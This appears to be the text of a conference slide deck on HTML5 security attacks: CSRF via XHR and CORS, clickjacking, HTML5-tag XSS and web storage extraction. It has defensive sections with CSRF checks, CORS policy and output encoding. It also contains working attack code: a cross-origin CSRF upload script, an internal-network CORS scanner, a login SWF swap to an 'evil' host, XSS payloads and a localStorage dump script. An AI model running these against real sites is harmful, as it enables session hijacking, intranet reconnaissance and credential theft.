HTML5 - Attacks on the rise


Headlines collected on the slide (news clippings):

- "2012 Security Predictions" (article looking back at the security incidents of 2011)
- "HTML5 offers five times the ways to hijack your website"
- "Rise Of HTML5 Brings With It Security Risks": HTML5 security issues have drawn the attention of the European Network and Information Security Agency (ENISA), which studied 13 HTML5 specifications drafted by the World Wide Web Consortium (W3C) and identified 51 security threats.
- "New web technologies like HTML5 fuel the growth for next year's web application attacks": "We predicted long ago that the web is the battleground for Internet attacks. This has proven ..."
- "HTML5 and Security on the New Web": "... are great, they radically change the attack model for the browser. ... Unfortunately, they can also present new opportunities for cybercriminals."
- "Web developers accountable for HTML5 security", by Jamie Yap, ZDNetAsia, October 5, 2010
- "Ghost of HTML5 future: Web browser botnets. With great power comes great responsibility ... to not pwn the interweb", Security, 27th April 2012 08:01 GMT

Evolution of HTML5


1991 - HTML started (plain and simple) 

1996 - CSS & JavaScript (Welcome to world of XSS and browser security) 
2000 - XHTML1 (Growing concerns and attacks on browsers) 

2005 - AJAX, XHR, DOM - (Attack cocktail and surface expansion) 

2009 - HTML5 (Here we go... new surface, architecture and defense) - 
HTML+CSS+JS 


What is running - where?

Diagram: client-side components versus server-side components.

- Client side (the browser, desktop and Android): HTML5, Silverlight and other plug-in components
- Server side components: Presentation Layer, Business Layer, Data Access Layer, Authentication, Communication etc.





















HTML5 & related technologies - Taxonomy & Status (December 2011)

Figure: the HTML5 specification and the related APIs grouped by maturity: W3C Recommendation, Candidate Recommendation, Working Draft, Non-W3C Specifications, Deprecated W3C APIs. By Sergey Mavrody 2011, CC Attribution-ShareAlike 3.0.

Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by-Sergey-Mavrody.png

Source: http://html5demos.com/

Evolution is going on in the Web Hypertext Application Technology Working Group (WHATWG).


HTML5 in a nutshell - Specs (demos from http://html5demos.com/, with the spec each one exercises)

- Simple class manipulation - classlist
- Storage events - storage
- dataset (data-* attributes) - dataset
- History API using pushState - history
- Browser based file reading (not part of HTML5) - file-api
- Drag files directly into your browser (not directly part of HTML5) - file-api, dnd
- Simple chat client - websocket
- Two videos playing in sync - video
- Interactive canvas gradients - canvas
- Canvas & Video - video, canvas
- Video - video
- Canvas - canvas
- Content Editable - contenteditable, storage
- Geolocation (works on Safari Mobile too) - geolocation
- postMessage same domain - postMessage
- postMessage cross domain - postMessage
- drag and drop - dnd
- drag anything - dnd
- offline detection (works on Safari Mobile too) - offline events
- navigator.onLine tests (doesn't use events, only polls) - offline
- on/offline event tests - offline events
- offline application using the manifest (FF 3.6 is still buggy - doesn't request the manifest after the initial load) - offline manifest
- Storage - storage
- Web SQL Database Storage - sql-database
- Web SQL Database - rollback test - sql-database
- Web Workers (watch out - uses a lot of CPU!) - workers
- example without Web Workers - will hang your browser - workers










Modern Browser Model

Diagram of the browser stack (desktop and mobile):

- Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services
- Core Policies: SOP/CORS/Content-Security, Sandbox
- Attack vectors mapped onto it: CORS Vectors, UI Redressing, DOM Attacks, APIs (Web Messaging & XHR; Storage, File and Cache; WebSQL and IndexedDB; Web Workers)

Threat Model

Diagram: the same browser stack placed against the server-side Presentation and Business Logic layers.





Attacks - Stealth and Silent...

XHR & Tags
- A1 - CSRF with XHR and CORS bypass
- A2 - Jacking (Click, COR, Tab etc.)
- A3 - HTML5 driven XSS (Tags, Events and Attributes)

Thick Features
- A4 - Attacking storage and DOM variables
- A5 - Exploiting Browser SQL points
- A6 - Injection with Web Messaging and Workers

DOM
- A7 - DOM based XSS and issues
- A8 - Offline attacks and cross widget vectors
- A9 - Web Socket issues
- A10 - API and Protocol Attacks


A1 - CSRF with XHR and CORS bypass

XHR - Level 2


• The XHR object of HTML5 (XMLHttpRequest Level 2) is very powerful

  - Allows interesting features like cross origin requests and binary upload/download

• xhr.responseType can be set to "text", "arraybuffer", "document" and "blob"

• Also, for posting data streams - DOMString, Document, FormData, Blob, File, ArrayBuffer etc.



CORS & XHR

• Before HTML5 - cross domain calls were not possible through XHR (SOP applies)

• HTML5 - allows cross origin calls with XHR Level 2

• CORS - Cross Origin Resource Sharing needs to be followed (OPTIONS preflight calls for non-simple requests)

• Adds extra HTTP headers (Access-Control-Allow-Origin and a few others)


HTTP Headers


Request

Origin
Access-Control-Request-Method (preflight)
Access-Control-Request-Headers (preflight)

Response

Access-Control-Allow-Origin
Access-Control-Allow-Credentials
Access-Control-Expose-Headers
Access-Control-Max-Age (preflight)
Access-Control-Allow-Methods (preflight)
Access-Control-Allow-Headers (preflight)
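The two sides of these headers, as an added example that is not from the slides: the "simple request" test a browser applies before deciding whether a cross-origin XHR needs an OPTIONS preflight, and a server-side policy for the response headers listed above. The origin in ALLOWED_ORIGINS is an assumption made for this example.

```javascript
// Added example (not from the slides): browser-side preflight decision and a
// server-side Access-Control-Allow-Origin policy. ALLOWED_ORIGINS is assumed.

const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SIMPLE_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SIMPLE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// True when the browser must send an OPTIONS preflight first. A POST with a
// text/plain or multipart/form-data body and no custom headers returns false:
// it goes out immediately, cookies included if withCredentials is set.
function needsPreflight(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(lower)) return true; // e.g. X-Requested-With, Authorization
    if (lower === "content-type") {
      const mediaType = value.split(";")[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mediaType)) return true; // e.g. application/json
    }
  }
  return false;
}

// Server side. Only origins on an explicit allow-list get an
// Access-Control-Allow-Origin header, and it echoes that exact origin rather
// than "*", so it can be combined with Allow-Credentials when needed.
// Browsers refuse "*" together with credentials, and reflecting an arbitrary
// Origin is the same as "*" with credentials for every site on the Internet.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]); // assumption

function corsResponseHeaders(requestOrigin, options = {}) {
  const { credentials = false } = options;
  if (!requestOrigin || !ALLOWED_ORIGINS.has(requestOrigin)) {
    return {}; // no CORS headers at all: the browser withholds the response from script
  }
  const out = {
    "Access-Control-Allow-Origin": requestOrigin,
    "Vary": "Origin", // the answer depends on Origin, so caches must key on it
  };
  if (credentials) out["Access-Control-Allow-Credentials"] = "true";
  return out;
}
```

needsPreflight("POST", {"Content-Type": "text/plain"}) is false, which is exactly why the JSON and upload CSRF calls on the following slides never trigger a preflight; corsResponseHeaders() answers an unknown origin with no CORS headers at all instead of reflecting it.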


XHR - Stealth threats


CSRF - powered by CORS and XHR

- Hence, a stealth channel and possible silent exploitation

- One way CSRF with any stream, since XHR allows a raw stream from the browser (XML, JSON, binary as well)

- Two way CSRF (POST and read the response both - in case Access-Control-Allow-Origin is set to *)

- Note: with Access-Control-Allow-Origin: * the browser only exposes the response to requests sent without credentials; a server that reflects the caller's Origin together with Access-Control-Allow-Credentials: true exposes the authenticated response as well


Silent Exploitation

• CORS preflight bypass - requests with certain Content-Types (text/plain, multipart/form-data, application/x-www-form-urlencoded) are "simple" and are sent without a preflight OPTIONS call

• Forcing cookie replay with "withCredentials"

• Internal network scanning and tunneling

• Information harvesting (internal crawling)

• Stealth browser shell - post XSS (Allow-Origin: *)

• Business functionality abuse (upload and binary streams)


CSRF with XHR/HTML5

Diagram of the attack flow:

1. The Client/Victim browser authenticates to the Authentication Server and works with the Web Store Application Server (backed by the Database Server). The session is still live - the user has not yet logged out.
2. The victim visits the attacker's page, which issues an XHR call to the store, leveraging:
   - a Content-Type that avoids the preflight
   - "withCredentials" set to true
3. The browser replays the session cookie and the request is executed as the victim.
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CSRF & HTML5 


<script language="javascript" type="text/javascript">
function getMe()
{
    var http;
    http = new XMLHttpRequest();
    // Cross-origin POST to the JSON service; the body goes out as text/plain,
    // a "simple" content type, so the browser sends it without a preflight
    http.open("POST", "http://192.168.100.12/json/jservice.ashx", true);
    http.onreadystatechange = function()
    {
        if (http.readyState == 4) {
            var response = http.responseText;
            document.getElementById('result').innerHTML = response;
        }
    }
    // JSON-RPC style request sent as a raw string
    http.send('{"id":2,"method":"getProduct","params":{"id":2}}');
}
getMe();
</script>



CSRF & HTML5

Proxy capture of the attack - the victim loads the attacker's page and the browser fires the cross-origin POST:

  #  host                    method
  1  http://192.168.100.26   GET /csrf/json.html        (original request - the attacker's page)
  2  http://192.168.100.12   POST /json/jservice.ashx   (auto-modified request - fired by the XHR)

Request:

POST /json/jservice.ashx HTTP/1.1
Host: 192.168.100.12
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: http://192.168.100.26/csrf/json.html
Cookie: cid=10001; ...

Response:

HTTP/1.1 200 OK
Date: Sun, 27 Nov 2011 22:... GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 921

{"id":2,"result":{"Products":{"columns":["product_id","product_name","product_desc","product_price","image_path","rebates_file"],"rows":[[2,"Bend it ... (remainder of the product record truncated in the capture: "Who wants to cook Aloo Gobi when you can bend a ball like Beckham ... London tries to raise their soccer-playing daughter in a traditional way ...")

The product data comes back to the attacker's page: the cookie was replayed and the response was readable.

CSRF/Upload


• A powerful XHR Level 2 call allows file upload on the fly.

• Interestingly - it is possible to craft a file through JavaScript and post it to the server - if no CSRF token is there.

• Example: your profile has a photograph of yours; you visit the attacker's site and that photo changes to something else.

• More serious threat: exploiting actual business functionality...


CSRF with XHR/HTML5

Screenshot: the web store's "upload your order form" page (Products 1.0 | XML | Flash | JSON | Silverlight | AMF | HTML5), logged in as Shreeraj Shah (U=10001), and the upload request the store's own form produces:

POST /user_upload.aspx HTTP/1.1
Referer: http://192.168.100.21/user_upload.aspx
Cookie: cid=10001; DemoTrading=1990b5bf9dde249a38ffc352f7b3e52b; ASP.NET_SessionId=...; JSESSIONID=8B59B1D61DFAFE7CEF97AFB03A103D13
Content-Type: multipart/form-data; boundary=-313223033317673
...

Diagram: Client/Victim Browser -> Authentication Server, Web Store Application Server, Database Server.
CSRF/Upload - POC

The legitimate upload request, as captured from the store's own form ("upload your order form" - Browse... - Upload - "Processing uploaded order..."):

POST /user_upload.aspx HTTP/1.1
Host: 192.168.100.21
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.100.21/user_upload.aspx
Cookie: cid=10001; DemoTrading=1990b5bf9dde249a38ffc352f7b3e52b; ASP.NET_SessionId=...; JSESSIONID=8B59B1D61DFAFE7CEF97AFB03A103D13
Content-Type: multipart/form-data; boundary=-313223033317673
Content-Length: 262

-313223033317673
Content-Disposition: form-data; name="FILE1"; filename="today"
Content-Type: application/octet-stream

Client: ABC inc.
1.1, Finding Nemo
2.1, Bend it like Beckham
-313223033317673--
CSRF with XHR/HTML5

Diagram of the forged upload:

1. The Client/Victim Browser is logged in to the Web Store (Authentication Server, Web Store Application Server, Database Server); its cookies include JSESSIONID=8B59B1D61DFAFE7CEF97AFB03A103D13.
2. The victim visits the Attacker's Site, whose script builds a multipart body in JavaScript and sends it with XHR (withCredentials = true) - "XHR initiates HTTP multi-part Upload".
3. "Success - cookie replayed": the store processes the order form as the victim.

Hence,

• Without the victim's consent or notice

• A stealth HTTP upload takes place

• Silent exploitation...
The attacker's page. The boundary in the header and in the body must match; the victim's cookies are attached because of withCredentials:

var stream = "Client: ABC inc.\r\n1,2,Finding Nemo\r\n2,4,Bend it like Beckham";
var boundary = "-146043902153"; // Pick boundary for upload
var file = "order.prod";

http = new XMLHttpRequest();
http.open("POST", "http://192.168.100.21/user_upload.aspx", true);
// multipart/form-data is a "simple" content type, so this cross-origin POST needs no preflight.
// (The comma before boundary and the missing "--" delimiter prefix below are non-standard;
// the ASP.NET target accepted them, as the capture shows.)
http.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
// Browsers ignore a script-set Content-Length and compute it from the body themselves
http.setRequestHeader("Content-Length", stream.length);
http.withCredentials = true; // replay the victim's cookies for 192.168.100.21

var body = boundary + "\r\n";
body += 'Content-Disposition: form-data; name="FILE1"; filename="' + file + '"\r\n';
body += "Content-Type: application/octet-stream\r\n\r\n";
body += stream + "\r\n";
body += boundary + "--";
http.send(body);

The request as it leaves the victim's browser:

POST /user_upload.aspx HTTP/1.1
Host: 192.168.100.21
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: multipart/form-data; charset=UTF-8, boundary=-146043902153
Referer: http://192.168.100.6/upload/csrf-up.html
Content-Length: 255
Origin: http://192.168.100.6
Cookie: cid=10001; DemoTrading=1990b5bf9dde249a38ffc352f7b3e52b; ASP.NET_SessionId=3ifeql4502ukzijxs; JSESSIONID=8B59B1D61DFAFE7CEF97AFB03A103D13
Pragma: no-cache
Cache-Control: no-cache

-146043902153
Content-Disposition: form-data; name="FILE1"; filename="order.prod"
Content-Type: application/octet-stream

Client: ABC inc.
1,2,Finding Nemo
2,4,Bend it like Beckham
-146043902153--

Note the Origin and Referer headers: they point at the attacker's host, which is what a server-side check can key on.


Crawl for CORS

<script>
function scan(url)
{
    try
    {
        http = new XMLHttpRequest();
        http.open("GET", url, false); // synchronous, so the outcome is known when send() returns
        http.send(); // throws when the cross-origin response is blocked (no Access-Control-Allow-Origin) or the host does not answer
        return true;
    }
    catch (err)
    {
        return false;
    }
}

var status = "";
for (i = 20; i <= 25; i++)
{
    target = "http://192.168.100." + i + "/";
    st = scan(target);
    if (st == true)
        status += "<br>" + target + "(Access-Control-Allow-Origin: -> " + st + ")";
    document.getElementById('result').innerHTML = status;
}
</script>


Diagram: the Client/Victim Browser, running http://192.168.100.6/portscan/scan.html, probes the Internal Web Server, Internal Web Mail and Internal HR Application. Result shown: http://192.168.100.21/(Access-Control-Allow-Origin: -> true)
Internal Scan for CORS

The same scan() loop run from http://192.168.100.6/portscan/scan.html. Only the host that answers with a permissive CORS header is reported:

Scan results
http://192.168.100.21/(Access-Control-Allow-Origin: -> true)

Raw response from the host that was found:

HTTP/1.1 200 OK
Date: Thu, 16 Feb 2012 07:22:58 GMT
Access-Control-Allow-Origin: *
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13456

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Store</title></head><body class="background">
<!--
File APIs & XHR


• It is possible to use the File API to power XHR calls - and to abuse them

• Uploading/drag-drop of files and directories is possible

• Hence, it is possible to bluff a user into selecting, say, the download folder, and then actually upload the content of that folder to the server

  - Browsers are supporting these calls

  - Another attack surface opening via File APIs



Scan and Defend


Scan and look for

- Content-Type checking on the server side

- CORS policy scan

- Forms and uploads with or without tokens

Defense and Countermeasures

- Secure libraries for streaming HTML5/Web 2.0 content

- CSRF protections (per-session tokens, Origin/Referer checks)

- Stronger CORS implementation (explicit origin allow-list; never Access-Control-Allow-Origin: * on authenticated resources)
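The three checks above, as an added example that is not from the slides: the server-side decision that makes the cookie-replay XHRs shown in the A1 captures fail, written as a plain function over a request object so it runs without a web framework. The session table, the token value and the request objects are constructed for this example; hosts, paths and headers follow the captures.

```javascript
// Added example (not from the slides): server-side CSRF checks for the upload
// and JSON endpoints of the A1 demo. SESSIONS, the token and the requests are
// constructed; SITE_ORIGIN and the header values follow the captures.

const SITE_ORIGIN = "http://192.168.100.21"; // the web store from the captures

// Constructed session store: session id -> user and the token issued to that session.
const SESSIONS = {
  "3ifeql4502ukzijxs": { user: 10001, csrfToken: "t0k3n-9f2c" },
};

function parseCookies(header) {
  const out = {};
  for (const part of (header || "").split(";")) {
    const idx = part.indexOf("=");
    if (idx > 0) out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

function originOf(url) {
  try {
    const u = new URL(url);
    return `${u.protocol}//${u.host}`;
  } catch (e) {
    return null;
  }
}

function lowerKeys(headers) {
  const out = {};
  for (const k of Object.keys(headers)) out[k.toLowerCase()] = headers[k];
  return out;
}

// Decides whether a state-changing request (upload, JSON-RPC call) may proceed.
// allowedTypes: the Content-Types the endpoint legitimately accepts.
function checkStateChangingRequest(req, allowedTypes) {
  const h = lowerKeys(req.headers);
  const session = SESSIONS[parseCookies(h["cookie"])["ASP.NET_SessionId"]];
  if (!session) return { ok: false, reason: "no session" };

  // 1. Origin (Referer as fallback). The browser sets Origin on a cross-origin
  //    XHR and script cannot override it, so a page on 192.168.100.6 fails here.
  const source = h["origin"] ? originOf(h["origin"]) : originOf(h["referer"]);
  if (source !== SITE_ORIGIN) return { ok: false, reason: "cross-origin request from " + source };

  // 2. Content-Type. A JSON endpoint that also accepts text/plain accepts exactly
  //    the preflight-free body the json.html page sends.
  const mediaType = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (!allowedTypes.includes(mediaType)) return { ok: false, reason: "unexpected Content-Type " + mediaType };

  // 3. Synchronizer token in a custom header: unknown to other origins, and a
  //    custom header on a cross-origin XHR forces a preflight that step 1 fails.
  if (h["x-csrf-token"] !== session.csrfToken) return { ok: false, reason: "bad CSRF token" };

  return { ok: true, user: session.user };
}

// Constructed requests shaped after the captures.
const COOKIE = "cid=10001; ASP.NET_SessionId=3ifeql4502ukzijxs";

const forgedUpload = { // csrf-up.html on the attacker's host
  headers: {
    "Origin": "http://192.168.100.6",
    "Referer": "http://192.168.100.6/upload/csrf-up.html",
    "Content-Type": "multipart/form-data; boundary=-146043902153",
    "Cookie": COOKIE,
  },
};

const forgedJsonCall = { // json.html: text/plain body, Referer only as in that capture
  headers: {
    "Referer": "http://192.168.100.26/csrf/json.html",
    "Content-Type": "text/plain; charset=UTF-8",
    "Cookie": COOKIE,
  },
};

const genuineUpload = { // the store's own form, token added by its JavaScript
  headers: {
    "Origin": SITE_ORIGIN,
    "Content-Type": "multipart/form-data; boundary=-313223033317673",
    "Cookie": COOKIE,
    "X-CSRF-Token": "t0k3n-9f2c",
  },
};
```

Both forged requests are rejected at the Origin/Referer step before the body is even looked at; the genuine one passes all three. The order matters: the token check alone would also stop the forgeries, but the Origin check costs nothing and catches a leaked token being replayed from another site.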


A2 - Jacking (Click, COR, Tab etc.)
Click/COR-Jacking


UI Redressing (Click/Tab/Event Jacking) attack vectors are popular ways to abuse cross domain HTTP calls and events.

HTML5 and RIA applications have various different resources like Flash files, Silverlight, video, audio etc.

If the DOM is forced to change an underlying resource on the fly and replace it with a cross origin/domain resource, it causes Cross Origin Resource Jacking (CORJacking).


• Iframe has a new attribute called sandbox

• It allows frame isolation

• Disabling JavaScript in the cross domain frame while loading

  - bypasses frame busting script

  - <iframe src="http://192.168.100.21/" sandbox="allow-same-origin allow-scripts" height="x" width="x"> - script will run...

  - <iframe src="http://192.168.100.21/" sandbox="allow-same-origin" height="500" width="500"> - script will not run - Clickjacking


CORJacking

It is possible to have some integrated attacks

- DOM based XSS

- Single DOM usage / one page app

- Flash

A DOM based issue can change the flash/swf file - it can be changed at run time - the user will not come to know...

Example

- document.getElementsByName("login").item(0).src = "http://evil/login.swf"



CORJacking

• Possible with other types of resources as well

• Also, reverse CORJacking is a possible threat

The login component as embedded in the page:

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
        id="Login" width="100%" height="100%"
        codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab">
  <param name="movie" value="Login.swf" />
  <param name="quality" value="high" />
  <param name="bgcolor" value="#869ca7" />
  <param name="allowScriptAccess" value="sameDomain" />
  <embed src="Login.swf" quality="high" bgcolor="#869ca7"
         width="50%" height="50%" name="Login" align="middle" ...

Firebug console, reading the resource the DOM currently points at:

>>> document.getElementsByName('Login').item(0).src
"http://192.168.100.111:8080/flex/testHelloWorld1/Login.swf"


Run Clear Copy History ^ 


Double eval - eval the eval

Payload -

document.getElementsByName('Login').item(0).src='http://192.168.100.200:8080/flex/Loginn/Loginn.swf'

Converting for double eval, to inject ' and " etc. without writing them literally:

- eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39))

(The character codes decode to the payload above.)



Scan and Defend

• Scan and look for

  - Clickjacking defense code scanning

  - Use of X-FRAME-OPTIONS

• Defense and Countermeasures

  - Better control on CORS

  - Creating self aware components and loading them only after checking the domain
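The X-FRAME-OPTIONS check above, as an added example that is not from the slides: decide from a response's headers whether a page can be framed by a given origin. It covers X-Frame-Options and the later CSP frame-ancestors directive, both of which the browser enforces regardless of whether the framing page's sandbox attribute has switched the victim's frame-busting script off. The header sets and the attacker origin are constructed for the example; the page origin follows the iframe examples.

```javascript
// Added example (not from the slides): evaluate framing protection headers.
// PAGE follows the iframe examples; ATTACKER and the header sets are constructed.

function lowerKeys(headers) {
  const out = {};
  for (const k of Object.keys(headers)) out[k.toLowerCase()] = headers[k];
  return out;
}

// "default-src 'self'; frame-ancestors 'self' https://*.partner.example"
//   -> { "default-src": ["'self'"], "frame-ancestors": ["'self'", "https://*.partner.example"] }
function parseCsp(value) {
  const out = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

// Does one CSP host-source (scheme://host[:port], host may start with "*.") match an origin?
function hostSourceMatches(source, origin) {
  const o = new URL(origin);
  let scheme = null;
  let hostPort = source;
  const i = source.indexOf("://");
  if (i !== -1) {
    scheme = source.slice(0, i) + ":";
    hostPort = source.slice(i + 3);
  }
  if (scheme && scheme !== o.protocol) return false;
  const [host, port] = hostPort.split(":");
  const originPort = o.port || (o.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && port !== originPort) return false;
  if (host.startsWith("*.")) return o.hostname.endsWith(host.slice(1));
  return o.hostname === host;
}

function sourceListAllows(sources, framerOrigin, pageOrigin) {
  for (const raw of sources) {
    const s = raw.toLowerCase();
    if (s === "'none'") return false;
    if (s === "*") return true;
    if (s === "'self'") {
      if (framerOrigin === pageOrigin) return true;
      continue;
    }
    if (hostSourceMatches(s, framerOrigin)) return true;
  }
  return false;
}

// True if framerOrigin is permitted to put the page (served from pageOrigin
// with these response headers) inside an iframe.
function canBeFramedBy(headers, framerOrigin, pageOrigin) {
  const h = lowerKeys(headers);
  const csp = h["content-security-policy"];
  if (csp) {
    const fa = parseCsp(csp)["frame-ancestors"];
    // When frame-ancestors is present it takes precedence over X-Frame-Options.
    if (fa) return sourceListAllows(fa, framerOrigin, pageOrigin);
  }
  const xfoRaw = (h["x-frame-options"] || "").trim();
  const xfo = xfoRaw.toUpperCase();
  if (xfo === "DENY") return false;
  if (xfo === "SAMEORIGIN") return framerOrigin === pageOrigin;
  if (xfo.startsWith("ALLOW-FROM")) { // legacy directive, honoured by only some browsers
    const allowed = new URL(xfoRaw.slice("ALLOW-FROM".length).trim());
    return `${allowed.protocol}//${allowed.host}` === framerOrigin;
  }
  return true; // no framing protection: the <iframe sandbox> clickjacking above works
}

const PAGE = "http://192.168.100.21";   // the framed target from the iframe examples
const ATTACKER = "http://192.168.100.6"; // constructed attacker origin
```

A scanner reports a page as clickjackable when canBeFramedBy(headers, attackerOrigin, pageOrigin) is true for an arbitrary attacker origin; a frame-busting script does not change that verdict, because the sandbox attribute can silence it.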


A3 - XSS with HTML5 (tags, attributes and events)

HTML5 - Tags/Attributes/Events

• Tags - media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)

• Attributes - form, submit, autofocus, sandbox, manifest, rel etc.

• Events/Objects - Navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
XSS variants

Media tags
Examples

- <video><source onerror="javascript:alert(1)">

- <video onerror="javascript:alert(1)"><source>

Demo: http://192.168.100.20/search.aspx?search=<video><source onerror="javascript:alert(1)"> - the payload reflected in the store's search page fires the alert (screenshot of the dvds4less store: MAIN | Catalog | Rebates | Login | Search | Blog | Widgets | Mashup).
XSS variants

• Exploiting autofocus

  - <input autofocus onfocus=alert(1)>

  - <select autofocus onfocus=alert(1)>

  - <textarea autofocus onfocus=alert(1)>

(Screenshot: the alert fires without any user interaction, since autofocus triggers the onfocus handler on load.)
XSS variants

Form & Button etc.

- <form id="test" /><button form="test" formaction="javascript:alert(1)">test

- <form><button formaction="javascript:alert(1)">test

Etc... and more...

- Nice HTML5 XSS cheat sheet (http://html5sec.org/)
Scan and Defend

Scan and look for

- Reflected or persistent XSS spots with HTML5 tags

Defense and Countermeasures

- Have the HTML5 tags, attributes and event handlers added to your blacklist (a blacklist alone always lags behind new vectors)

- Standard XSS protections by contextual output encoding
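Why the slide pairs "add to blacklist" with "encode", as an added example that is not from the slides: the HTML5 payloads listed in A3 run against a typical pre-HTML5 blacklist and against contextual output encoding. The blacklist regex is constructed here as a representative legacy filter, not taken from any product; the search page renderers are stand-ins for search.aspx.

```javascript
// Added example (not from the slides): legacy blacklist versus output encoding
// on the A3 payloads. LEGACY_BLACKLIST and the render functions are constructed.

const HTML5_PAYLOADS = [
  '<video><source onerror="javascript:alert(1)">',
  '<input autofocus onfocus=alert(1)>',
  '<form id="test" /><button form="test" formaction="javascript:alert(1)">test',
];

// Representative legacy filter: script/iframe/img tags and the classic handlers.
const LEGACY_BLACKLIST = /<\s*(script|iframe|img|object|embed)\b|\bon(load|error|mouseover|click)\s*=/i;

function blockedByBlacklist(input) {
  return LEGACY_BLACKLIST.test(input);
}

// Payloads the legacy filter lets through unchanged.
function missedByBlacklist(payloads) {
  return payloads.filter(p => !blockedByBlacklist(p));
}

// Encode for an HTML text node or a quoted attribute value. Every character
// that can open a tag, close an attribute or start an entity is replaced, so
// the browser renders the payload as text regardless of which HTML5 tag,
// attribute or event name it uses.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };

function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, c => HTML_ESCAPES[c]);
}

// After encoding there must be no character left that the HTML parser treats as markup.
function stillContainsMarkup(encoded) {
  return /[<>"']/.test(encoded);
}

// The reflected search page from the demo, written both ways. The first
// reproduces the search.aspx behaviour shown above; only the second is safe.
function renderSearchUnsafe(term) {
  return "<p>Results for: " + term + "</p>";
}

function renderSearchSafe(term) {
  return "<p>Results for: " + encodeForHtml(term) + "</p>";
}
```

The legacy filter catches the media-tag payload only because onerror happens to be on its list; autofocus/onfocus and formaction sail through. Encoding does not need to know any of those names.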
A4 - Web Storage and DOM information extraction
Web Storage Extraction

• The browser used to have one place to store data - the Cookie (limited in size and replayed on every request)

• HTML5 - Storage API provided (Local and Session)

• Can hold global scoped variables

• http://www.w3.org/TR/webstorage/

interface Storage {
  readonly attribute unsigned long length;
  getter DOMString key(in unsigned long index);
  getter any getItem(in DOMString key);
  setter creator void setItem(in DOMString key, in any data);
  deleter void removeItem(in DOMString key);
  void clear();
};
















Web Storage Extraction

• It is possible to steal them through XSS or via JavaScript

• Session hijacking - HttpOnly is of no use here (localStorage is readable by script; a cookie flagged HttpOnly is not)

• getItem and setItem calls

Application code that parks a session hash in localStorage (from the demo app):

<script type="text/javascript">
localStorage.setItem('hash', '1fe4f213cc1d3d936caeb9ac316dffcc');
function ajaxget()
{
    var mygetrequest = new ajaxRequest()
    mygetrequest.onreadystatechange = function() {
        if (mygetrequest.readyState == 4)
        {
        ...

• XSS the box and scan through storage
if (localStorage.length) {
    console.log(localStorage.length)
    for (var i = 0; i < localStorage.length; i++) { // key(i) walks only the stored keys, not Storage's own methods
        var k = localStorage.key(i);
        console.log(k)
        console.log(localStorage.getItem(k));
    }
}

• The above code allows extraction of all storage variables

Console output on the demo page:

1
undefined
hash
1fe4f213cc1d3d936caeb9ac316dffcc



File System Storage

HTML5 provides a virtual file system with filesystem APIs

- window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;

It becomes a full blown local file system for the application, inside the browser sandbox

It empowers the application
File System Storage

• It provides a temporary or a permanent file system

function init() {
    // ask for 1 MB of TEMPORARY storage; the callback receives the FileSystem object
    window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) {
        filesys = filesystem;
    }, catcherror);
}

• The app can have a full filesystem in place now.
Sensitive information in the filesystem

Assuming the app is creating a profile on the local system:

function profile() {
    filesys.root.getFile('profile', {create: true}, function(entry) {
        entry.createWriter(function(writer) {
            var myblob = new window.WebKitBlobBuilder();
